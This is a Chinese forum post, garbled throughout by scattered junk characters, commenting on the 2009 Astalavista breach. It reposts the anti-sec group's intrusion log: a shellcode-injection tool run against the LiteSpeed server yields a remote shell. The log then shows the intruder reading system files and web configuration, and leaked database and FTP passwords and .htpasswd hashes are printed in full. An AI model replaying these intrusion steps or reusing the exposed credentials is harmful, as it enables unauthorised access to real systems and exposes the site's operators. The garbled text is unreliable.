里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。3 {8 U" k9 i8 A
! x! |& e! g0 I0 F! V F/ v[root@front3 ~]# curl -I litespeedtech.com
3 V9 J# [& T9 WHTTP/1.1 200 OK
! C4 V$ F6 c8 m/ k" y8 HDate: Fri, 05 Jun 2009 22:54:51 GMT- Q; M- Y4 X- Y! p& O
Server: LiteSpeed
" [* C e) @9 D- X1 i+ I% R8 A7 @) k) s
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
- b3 t% o' A; a. H! W9 V2 ]$ q( q4 k8 b) t; D3 O8 L
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
; x5 p8 k1 ]- w% E
! S( T4 j; S( l* N( ?! ?! |( W, H
( E! ^3 k5 K) B+ K' ~5 H' v/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \ " A# ~. a ]+ H2 x# a6 Z" s9 ~+ ?
/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
8 B/ W2 a) g6 V; K" C( C5 ^/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \8 y6 g+ Q S! h% c$ V
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
0 ]2 Q. z9 Y$ g5 b \/ \/ \/ \/ \/ \/ \/8 V- w8 ^3 Y( f
The Hacking & Security Community
! c: y- ^4 p$ z4 m[+] Founded in 1997 by a hacker computer enthusiast. K4 i# C; G6 \; Q5 D! E ~+ G
[-] Exposed in 2009 by anti-sec group; R$ ^ ~' r; K$ Y
, N3 T- R- r$ a% S4 ?9 g
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
) O$ j" O) O. X>> 03. Who’s behind the site?
z8 z( z& ^& M- r* ]) p- M G! Q>>
) T% ^! C) ~" A: V1 A& c% a- X>> A team of security and IT professionals, and a countless number of contributors from all over the world.8 d6 H/ }8 {. o# H5 V# P- M6 ~
9 \, g4 L( r G4 s- T( K3 u
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
. k1 |, W2 O& y>>2 N. l$ [! J# o. x7 r& O
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and! U5 q' z' B, c) f
military institutions.
: E6 |; I" w6 i>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information." Z7 p4 V) [0 K0 X# @, I
: u! _8 t8 \# Z& N4 Z" q5 {Why has Astalavista been targeted?
/ ?0 e: N$ r- q
( l3 d; q$ K0 H7 r. E+ W1 S S: ^, rOther than the fact that they are not doing any of this for the “community” but* X/ v/ D' A5 X0 `
for the money, they spread exploits for kids, claim to be a security community
0 Y9 n5 b; f y! E( g+ C- |* K(with no real sense of security on their own servers), and they charge you $6.66
5 ~. Y: {$ T3 {' Qper months to access a dead forum with a directory filled with public releases# K, N3 Q+ n7 c" T$ e7 ]6 r, t
and outdated / broken services.
: ~1 _! l9 L2 [5 k2 s; `
( j2 \ w% a9 s FWe wanted to see how good that “team of security and IT professionals” really is." [7 n2 v0 x/ M [' e- Z( y! j
j9 N& x! c4 v0 b' z- z; T
Let’s begin.
- j9 S2 R. I: x5 u$ K" G0 Z- Q7 J' x1 d
anti-sec:~# ./g0tshell astalavista.com -p 80
$ W5 z- ]$ u: S* c[+] Connecting to astalavista.com:80- f$ f/ H6 ~5 B3 E1 j
[+] Grabbing banner…
2 n5 ^' U. M5 n4 Z# {LiteSpeed
( {2 t3 w+ k I* ~9 p# {[+] Injecting shellcode…" @6 ^2 T% v& n! T" n1 r0 @! @
[-] Wait for it0 @% T# n7 Z- a/ @ e) I
! g' q; N4 l5 `6 e2 p! t- C0 \: S[~] We g0tshell" J9 Z0 ?1 q3 v$ V
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
% |! v5 s. T9 a! LID: uid=100(apache) gid=500(apache) groups=500(apache)/ h: H3 s4 H" M) A3 Y& i5 m3 v
, C- m5 b# P/ E D# P! L
sh-3.2$ cat /etc/passwd
" \8 f: X, R) v# Groot:x:0:0:root:/root:/bin/bash
3 B: M" `) F! p/ S- q: _! n6 Tbin:x:1:1:bin:/bin:/sbin/nologin1 x ~3 G" H/ G8 s
daemon:x:2:2:daemon:/sbin:/sbin/nologin
% \* e) M$ h/ D& Eadm:x:3:4:adm:/var/adm:/sbin/nologin
) m" a' q1 b8 @8 U) Y9 Xlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
; |8 Q0 v4 i# U/ n4 B7 Async:x:5:0:sync:/sbin:/bin/sync E3 G" g2 s! X2 `, S
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown7 s0 J! c0 D4 M8 Z4 |# m3 G+ M
halt:x:7:0:halt:/sbin:/sbin/halt5 H6 ^+ L/ n" ]
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
3 M1 k# S1 K! G! m. J* ~. vnews:x:9:13:news:/etc/news:
- n4 P7 D, p/ G, T1 K) _7 buucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
% y7 J0 m, } f V# U# k6 loperator:x:11:0 perator:/root:/sbin/nologin
5 r$ e! z0 V5 |5 V. sgames:x:12:100:games:/usr/games:/sbin/nologin
6 Q. @+ m. ^# h |7 T. rgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
7 W% \! N% Y# x7 yftp:x:14:50:FTP User:/var/ftp:/sbin/nologin6 t" A* x+ {: Z: f1 A
nobody:x:99:99:Nobody:/:/sbin/nologin! E1 l/ ?* E. w& V$ [. {
rpm:x:37:37::/var/lib/rpm:/sbin/nologin- _5 v/ T" E% [- j/ z% W! E
dbus:x:81:81:System message bus:/:/sbin/nologin
0 M; G4 c- d! X/ `" [nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
) ?6 u2 E5 u( ~$ B- |) Lmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin! Y& }3 A! r2 f9 x8 Q$ }* L
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin2 `0 I% ~& l/ m; p* B2 F1 r
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin& @ O! H3 d2 P2 B6 \
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
2 G: b1 j3 p" ^. B2 l! b) W' ?) ]rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin+ `8 U" T( K8 @* \1 g4 A O
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin: A% ~4 B# `( `2 d$ O
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin6 e7 E0 y. i M) T$ |
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin0 v; j; E' l, R
pcap:x:77:77::/var/arpwatch:/sbin/nologin
4 f; R2 h" o- \' y* e# @/ `: \0 b, xnamed:x:25:25:Named:/var/named:/sbin/nologin
1 @; k( i, I' kapache:x:100:500::/var/www:/bin/false: d1 @5 |1 u2 C2 y7 ?
diradmin:x:101:101::/usr/local/directadmin:/bin/bash" ~+ U# G2 X; H% N5 F1 w) M
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
9 y6 z% J6 m6 R+ M$ dwebapps:x:500:501::/var/www/html:/bin/bash
, R% y7 Z+ Y! _+ {1 Kmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
- K; R2 M) N8 B$ a" ^+ Radmin:x:501:502::/home/admin:/bin/bash2 h ?1 e, L5 h# h+ P6 h' h
jon:x:502:503::/home/jon:/bin/bash
/ z/ F+ h/ q" x6 kcom:x:503:504::/home/com:/bin/bash5 @4 |2 O. J0 ^) I$ s- M$ _
ntp:x:38:38::/etc/ntp:/sbin/nologin
$ h" G7 j: L( O' U& E" @. `ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin% m: y1 y! t, y4 d- W, n0 M3 q
astanet:x:504:505::/home/astanet:/bin/bash
6 V3 [- w* c) q; |7 ^avahi:x:70:70:Avahi daemon:/:/sbin/nologin! L* C+ {* V, c4 F
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin' o$ ~& |8 }' V) O! ~0 K0 ?
0 b0 }& x6 G# f5 Z
sh-3.2$ cat /etc/hosts
( v$ h1 }! |* U7 f, P; f2 D' V3 g# Do not remove the following line, or various programs& h( J6 Z4 Q) t- A
# that require network functionality will fail.
4 h. p# }& S5 m) [8 |: l127.0.0.1 localhost.localdomain localhost
* e" i! ?+ E, |9 D::1 localhost6.localdomain6 localhost6
' |+ ?; s5 b6 i7 L80.74.154.172 asta1.astalavistaserver.com
9 F$ X# u- {2 b* J/ w, Q
0 j4 X) m5 Z& s5 h3 f* G f N! dsh-3.2$ pwd' Y6 g5 Q* p1 i% Y) [. q2 W! Q
/home/com/public_html; ~3 F* W/ D& y- ]: {$ u8 V2 X% u
& j) A* @0 h- Y4 c% ]sh-3.2$ ls -la
2 X8 p' ^5 w0 t" d* ~( ^$ o+ \total 18460
3 z z" m5 a+ v7 s; J/ Fdrwxr-xr-x 30 com apache 4096 May 28 17:06 .
9 e8 V7 Q/ Y5 A% p' adrwx–x–x 11 com com 4096 Jun 25 2008 ..* z3 P: R% A) a; P$ d" r9 K r
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
9 O3 [ o) c( W5 y/ Ydrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
0 ?. G5 u4 m' x$ |drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
9 a! i8 ^9 o& j7 _9 n5 ddrwxrwxrwx 2 com com 4096 May 19 00:50 config! `; {% ~4 j% S* A6 m5 j
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
: O$ Y( h7 m+ D* d; @drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules5 }# [4 f' a: @" Y" s
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing
9 O$ [& g1 G# Q: ~. v( u& sdrwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
2 j4 P" l. F" Pdrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__/ p+ `5 A8 ~5 W
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php0 P" F1 Z3 G1 h+ P* w
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
0 N8 l: K7 |% |3 I$ e# Qdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor" A& K3 x/ L! s) D ~0 i
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico B \) i- G% @0 s( k
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed9 L: s$ v3 G% g
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
9 }) @& B! b |# M-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
2 d0 B( c; G" W/ E6 S7 z D-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
3 ?) o* J8 F e1 fdrwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
* i+ F& `9 ~; O! A% Y sdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images2 n* l+ X+ I) R/ V( J1 i& X5 V9 \, k
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
- Q8 c) i* M8 M+ Y0 [drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
; ?: O0 p0 ?1 ^, e E- ?drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang: o, S( s6 t$ m$ |- k
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib P0 L7 @( j0 T5 c: @
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media2 t4 b5 u* Q" A
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications# M3 D ?" n/ u: \/ k- }6 z- T
drwxr-xr-x 34 com com 4096 May 28 16:30 modules, S* N0 |, }" f3 a
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin# T4 }& v( Q; _7 i" J1 n
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
4 E, Y% s' J( C. ?( U+ E; P( Sdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old C% z( ?' Q- u
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
" Z- {; E' [$ w. ]( n+ H. y* Z! Hdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy2 b1 X" |; s! n, b7 R' @
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt
; Q% }4 _1 A7 S' _1 u* n) W-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
( c! @) s' G3 l7 O. k8 g; L-rw-r–r– 1 com com 223 Mar 30 15:32 test.php! H y3 \- K0 H# V
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes0 G# x/ V: y' o, ^/ F, O
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp
; u* F/ J: a: k4 M8 g; Q* D1 s0 a8 idrwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam) K3 a% I/ S" `! j* r$ J n3 `- J& x
6 d; E2 J4 }0 z) v& i7 D
sh-3.2$ head -20 index.php
& t3 m! r$ v2 z6 Q( w5 P# ]) X0 R<?php
/ {) ~9 V) z! y. O
9 R: a$ `! U) A2 }! ]2 ^7 z/**
) r- M1 f' d. x* The main page for the CMS/ j+ l1 t1 p+ {2 F% a* V
* @copyright CONTREXX CMS - COMVATION AG1 \8 j! u" H. F: b9 V6 f0 K1 U
* @author Comvation Development Team
! j# c5 s5 |5 }* u4 E* @version v1.0.9.10.1 stable
h% N- r( J7 h; ~+ l# {* @package contrexx# H; M& S2 r3 @$ j& e$ ~* j
* @subpackage core8 F7 g# T: k8 _# H- ^: P) I+ M
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage; ]4 A7 B! d$ Z+ l- ?! M* ~
* @since v0.0.0.0. q! S+ R' t' [' ]/ a8 Z
* @todo Capitalize all class names in project2 E/ l1 N4 v: a/ N0 t$ G/ b
* @uses /config/configuration.php7 u7 @: y. C4 C& p
* @uses /config/settings.php1 ]+ m3 `9 u9 x4 ?
* @uses /config/version.php
6 V; m. B7 O& }' ]5 Z* @uses /core/API.php
, t7 c9 K1 @. ?4 _% d) L* @uses /core_modules/cache/index.class.php
z6 L7 w/ u1 @/ I* @uses /core/error.class.php! D9 O$ v: D9 v9 A2 @
* @uses /core_modules/banner/index.class.php$ _; ^! P% V% d* \
* @uses /core_modules/contact/index.class.php5 f! H v! q% K h( g4 Q1 B# i- q+ Q
' k% X5 z' \3 p
sh-3.2$ cd config/$ I5 ]$ p3 x- N' ~
sh-3.2$ ls -la: ?7 z) R: |* F: l/ g. |/ X4 a
total 32/ H$ a3 [$ z* e
drwxrwxrwx 2 com com 4096 May 19 00:50 .( c- k+ s3 W0 n6 U0 v' F
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
U; U& u( i4 E-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
/ J- y' N7 V/ {: T9 f3 z6 M7 c1 A-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! M- M' {9 R/ O) x
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
- ~+ d- \" C* u7 S2 ?. p' w-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php+ T, i2 R6 G( g/ B
2 j. V3 [7 h, @2 S4 Msh-3.2$ cat configuration.php
1 I6 i' w( i) C[snip]
( ]0 G, [! n: x l3 L$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost j$ r# H% ? q' D8 ]
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name7 q( ~) p2 B. G! f5 ]/ u& [9 _
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
' E6 t' `5 [3 Z9 i$ V6 m$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username' {3 x' t) `: y
$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
2 x) a* n* J, n# z& [, e1 i$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)" ]. T; d* s5 P$ W- I" {
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)4 p- [3 p v- z# Q+ K4 K
[snip]. D9 x t$ z2 C# H9 i
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
/ j+ I0 u' H g1 L$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
! _, P( z' a. ~. K8 O' O" |& {$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
) L. u: [1 e" i8 P7 t2 A: b5 T. B$_FTPCONFIG['port'] = 21; // Ftp remote port; m6 G" t, Y% F
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username/ h, C. e% Y1 [4 H
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password8 P7 Y- m% w# T
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms/ O& V8 u- V2 r2 I8 ~: Y
) ]; l5 x$ B% b4 Q: m$ y$ U" osh-3.2$ cd ..
2 I$ L0 ~3 h( }( Zsh-3.2$ cd dvd/
: t l) S6 e. _3 ?sh-3.2$ ls -la/ O* z6 W' C3 `8 x5 w0 R1 |) E; E
total 2913780$ A* [7 m) r+ Q
drwxr-xr-x 2 com com 4096 Sep 9 2008 .
/ S: p1 ?+ y6 N& Fdrwxr-xr-x 30 com apache 4096 May 28 17:06 .." N, ]* o) M8 V, ?) N' p( G
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
- n% Z5 L5 ^$ G W( K- f8 e1 G) ?-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
, c; j# d7 |3 n/ O-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
- H- M, X: G8 C+ m' h-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess; C4 m# V. ~2 w6 f9 O2 n
0 g$ @: w K0 u- g5 K0 Rsh-3.2$ cat .htaccess
, L9 [6 c' F9 G- e3 h+ SauthType Basic
, m0 S2 W. b4 @* @6 ~( K( x- i* MauthName DVD
% j% D4 r, i, x( w5 N; N. W, AauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd7 ?8 E S) n: J4 n
require valid-user @0 q) b: x0 t$ J
8 C3 c6 V" Y1 W# xsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 C2 h& {" v+ ]8 U/ ODVDdownload:CRD8cuY6.MPT6
8 @6 k0 q) B" ?: _ UDVDdownload2:CR8a36.wluFMg
2 b+ K8 C8 B! ]
% `3 L$ Z; ?3 a5 d2 D" Csh-3.2$ cat test.php
, ^! D- ]0 m- L3 Z6 \0 t<?php
4 M( C0 ]( @8 M! k$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;! E1 N& P- e# e4 p2 u
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
& q4 Y( s) ]; z7 F1 @- p! Pecho $url;
* F {/ c- T2 p?>
" t& C; n% J/ B9 s5 O
) e9 |" C% K9 F% V8 E' T+ Hsh-3.2$ cd modifications/- h6 I5 X( O$ L6 }
sh-3.2$ ls -la
# I2 j& H) N5 g. a" z1 @total 320 W( y( p: ^2 j/ W) p1 M( a
drwxr-xr-x 8 com com 4096 May 11 12:48 .
6 C1 j! R4 X. T, Rdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..8 e" M$ H& S$ Q0 \
drwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng5 j! O( p' S. B$ z1 [2 ^. `
drwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
* U' Q! K# \. v7 x# T$ k" ?8 `drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools A$ @: s6 {! G0 W
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc5 c* X, R5 {8 J0 n. Q4 Z' Z1 B; y
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search, \# p, g( E, V6 F; h* \! ]
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
' X& }' R0 \0 _/ G* E Z, ^( L
7 W6 x4 r: {$ Ksh-3.2$ ls -R; e# c% |6 t F- t( L9 h
.:! k) d8 G. G' F- {3 q5 O/ }1 P2 N
com_avtng cronjobs onlinetools pjirc search _tmp
0 ]8 d) i: H- ^0 \: d6 D3 d2 f2 g0 F
./com_avtng:
1 s. r. H% a+ {4 iavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
% n6 ^2 _3 J# r
& o: b+ N$ C! C- E+ i# S./com_avtng/scripts:
6 o5 ^: D, n# y% x. e1 Hpopunder.js2 Y" a# }9 |# b- g
- f! R' s8 w% q, h7 J4 g./cronjobs:
5 i/ d" y/ S% z' Aexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
) a m. l8 w8 P o9 ]6 \: L! b2 t$ u
- I( a- [/ n7 q: u5 j0 S1 h./cronjobs/tmp:; s. ]7 c/ l- |: G; N
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv7 [" t& l4 {6 |- {4 S
/ h3 O, A2 O5 e./onlinetools:+ |3 x- A! S" K e2 z( d! [* h/ o
index.php0 E: j/ d3 ~2 d5 v" y! ~
8 ^3 b% h* t) Q0 c$ |7 q./pjirc:, W5 N' O7 m5 {8 k
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt p2 l$ E. N4 R: L' M7 W
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
' U3 F+ ?; h/ C7 D6 A0 g. Abackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
; C2 g. y8 V# U' M, Z! H* J' k; [' H8 b: w# j/ Y
./pjirc/img:& h- X6 f% |3 x+ V
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
+ E0 [+ R, Z9 Q$ {1 Warbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif ) E8 U& m! C J1 d
verre-eau.gif0 D3 Y# q5 ?! e: Z: u! R
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 7 `( m, Q |0 Z' b. y
verre-vin.gif7 V0 ~- `* V) G: i" C! c+ s W
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
. H& ]8 d; D" l; @ q! O' E( _biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif" c& U4 \' E9 I+ c+ ]3 O
# _2 U' t$ o0 e) P, F5 o./pjirc/snd:/ h# D3 W2 b7 d, `9 Y
bell2.au ding.au
. Z( f6 p0 E- ?9 z3 P' u
$ F$ V( Q2 e; X" f- o& @./search:
0 s, J. ]6 [: m0 d) K: y) M9 _searchEngines.php search.php& d, M( e5 b! O0 }) G0 V' b) g
# z8 D/ K3 x# A
./_tmp:% @5 ?2 q4 v% t" W
defaultPorts.php defaultPorts.txt
7 k6 G- f8 M/ w: T1 w: ~* M; H8 t& p: l' G
sh-3.2$ cd cronjobs/
$ A6 X; D3 |, e9 k: h# t' _sh-3.2$ cat exploits.php( A" i+ E K( X
[snip]
4 e( Y% M9 J `$ F+ q$categories = array();: X( l! v6 p$ h( C, [! i
$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;! A! D! i2 z% G' S" q }
$expolits = file($milw0rmFile);
: J4 R9 x; N; o$ f# U' G4 ]1 [$comExploits = array();
7 K( r/ c' J* D% g[snip]( f0 Z# o! x1 n( W; h; D+ v3 X# @
// manage data
, R8 e9 R7 ^& O$ D% }# P" Pfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
. b, c. S- L9 O9 ]8 y+ }
: [/ e) M5 N% u; J0 {9 i // get path and title
% R. _$ k" Y2 s/ }7 H $expolits[$x] = trim($expolits[$x]);
8 J4 ~0 V" L& {. j1 } $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
/ ]% k' L9 S1 u7 |% U. g $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);, e4 A# {4 g. m& C7 Q
/ a* X7 X6 w. b" [
// check if file exists0 O% U4 r/ O6 u2 f
if (file_exists($path)) {! G1 _) e, n! N7 [; W+ _# s
! o3 _2 K# K9 K2 a4 o, W! y $text = file_get_contents($path);
1 E& `* y: Z, m
$ I' P2 B( @$ z2 z, g1 ] // get content and date
" r" d# b( j6 z- L3 D, C. h* R* W //$text = htmlspecialchars($text, ENT_QUOTES);
W4 ?: Y- h5 m $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
# q( @" D: T% @3 W, H; ]& K$ @; z if ($tmptext != ”) {* i% f" }+ c7 a" Q2 g0 J3 }
$text = $tmptext;; r( Q' `7 ]! N! Q0 C4 X- n
} else {
8 `4 \* i: ^/ F3 w $text = addslashes(htmlentities($text, ENT_QUOTES));2 D9 A: r9 b$ @: h
}& b) K% D& x. C
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
* J% p( F( Y. O/ o; w. U $tmp = explode('-', $date);6 P; [9 b1 {) W6 M5 P3 o& `' L) X
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));2 o" K. R" {/ r( q8 a/ d
$cat = getCategory ($path);. b% l8 L, l$ B( q# z4 N5 ^
$ext = pathinfo(basename($path));) ]3 F+ I: M# a+ p# `* i- O
$ext = $ext['extension'];
5 n8 _7 A8 v1 Q $qStr = ”
$ R) e; M/ a0 ~ SELECT `id`
' J" [8 S: h M1 ~4 M: U: r FROM `contrexx_module_exploits`
& p+ a% A2 q9 I- U/ B WHERE `title` = ‘” . $title . “‘' _- |; S) D" {" D* `
AND `date` = ‘” . $date . “‘5 @5 b$ H5 Z7 k4 I! }
“;
7 w$ p, E5 V- y echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
r, t W) ^7 r6 k3 C3 N& J $q = $_objDB->query($qStr);
' s; G: a! l9 y) I5 k: [
; W: S: b% q" u2 W, E& P7 v if ($q->numRows() == 0) {+ f) ^0 X9 H( R1 a
1 D4 w) [9 i2 t
// prepare array6 B/ ?+ l. B W4 V7 }7 c
$comExploits[$x]['date'] = $date;/ x4 _$ A& m+ |, [
$comExploits[$x]['title'] = $title;
, y0 r* w9 q2 v5 O6 B $comExploits[$x]['author'] = ‘milw0rm’;" C0 x0 E" [! {- r1 M% J
$comExploits[$x]['text'] = $text;
* G$ v) X' @3 ~" e" X1 f' X $comExploits[$x]['source'] = $ext;/ J8 W# K2 C r3 M
$comExploits[$x]['url1'] = ”;
# X: T# T" {1 ]0 Y $comExploits[$x]['url2'] = ”;" E% g/ i2 z# ^7 l# Y0 C: M2 w7 ^* g
$comExploits[$x]['catid'] = $cat;
" q9 Q" s2 e1 s+ g0 @: j3 W( j $comExploits[$x]['lang'] = ‘2′;' L+ x" G1 Z F" U9 i! {- f
$comExploits[$x]['userid'] = ‘12′;
) S w# d% W" t& |0 C $comExploits[$x]['startdate'] = ‘0000-00-00′;
" T2 {5 j3 C) P* e$ U $comExploits[$x]['enddate'] = ‘0000-00-00′;
# e4 ^1 t. c. G $comExploits[$x]['status'] = ‘1′;5 W, ? v5 p# J* V* o
$comExploits[$x]['changelog'] = $date;
5 v- t8 h8 N5 @, _9 J, o% d- `: W( e. g% h
}
6 K- [; k! q& \3 }1 \% I2 v[snip]
4 T( U- G; Q: k7 F0 S3 g6 k $xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
& c! n/ L) K4 V# q# b. I' f! P0 o<rss version=”2.0″>1 a( I6 N" U4 X2 H$ n; j
<channel>
8 R( i& Y* M8 z: b4 \ \3 F4 a <title>ASTALAVISTA.com - Exploits</title>
# E) h$ l2 j. i3 l% k; T <link>http://www.astalavista.com/exploits</link>
( v" X! h% m1 q! N <description>All availably Exploits.</description>% x( k/ G7 {7 n
<language>en-us</language>
